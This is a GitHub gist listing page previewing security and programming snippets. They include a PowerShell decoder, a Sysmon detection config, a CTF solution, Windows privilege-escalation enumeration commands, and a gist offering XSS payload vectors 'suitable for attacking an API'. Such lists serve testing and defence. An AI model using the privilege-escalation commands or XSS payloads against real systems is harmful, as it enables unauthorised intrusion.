Skip to content

Instantly share code, notes, and snippets.

View cokebottle's full-sized avatar

cokebottle

30 followers · 28 following
View GitHub Profile
anonymous
anonymous / psx.py
Created November 13, 2016 14:32
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
@Neo23x0
Neo23x0 / config-client.xml
Last active May 17, 2021 04:14
Sysmon Base Configuration - Workstations
<!--
This is a Microsoft Sysmon configuration to be used on Windows workstations
v0.2.1 December 2016
Florian Roth (with the help and ideas of others)
The focus of this configuration is
- malware detection (execution)
- malware detection (network connections)
- exploit detection
It is not focussed on
@mtnmts
mtnmts / solve_stego.py
Created July 26, 2014 17:03
Solution for Stego75 - Pwnium 2014
# Author : Matan M. Mates
# Purpose : Solve Stego75
import Image
# Color ladders
LADDER_RANGES = [((1,0) , (56,55)),
((57,0), (112,55)),
((113,0), (168,55)),
((169,0), (224,55)),
((225,0), (280,55)),
@sckalath
sckalath / windows_privesc
Last active July 5, 2025 09:41
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@sloria
sloria / bobp-python.md
Last active May 28, 2025 02:41
A "Best of the Best Practices" (BOBP) guide to developing in Python.

The Best of the Best Practices (BOBP) Guide for Python

A "Best of the Best Practices" (BOBP) guide to developing in Python.

In General

Values

  • "Build tools for others that you want to be built for you." - Kenneth Reitz
  • "Simplicity is alway better than functionality." - Pieter Hintjens
@trietptm
trietptm / Programming_7_auto.py
Created July 16, 2013 08:22
Security Override - Programming Level 7 http://securityoverride.org/challenges/programming/7/index.php In order to complete Programming Challenge 7, you must code a script that will factor the number below into its prime factorization, and add those prime numbers together. Example: 42 -> 2, 3, 7 -> 12
import urllib2, re
import urllib
opener = urllib2.build_opener()
opener.addheaders.append(('cookie', 'fusion_visited=yes;PHPSESSID=myPHPSESSID;fusion_user=myfusion_user;__atuvc=my__atuvc'))
response = opener.open('http://securityoverride.org/challenges/programming/7/index.php','')
data = response.read()
regex = r"<code style='white-space:nowrap'>.*</code>"
result = re.search(regex, data, re.DOTALL)
result = result.group(0)
result = result.replace('\n', '')
@willurd
willurd / web-servers.md
Last active July 8, 2025 00:19
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>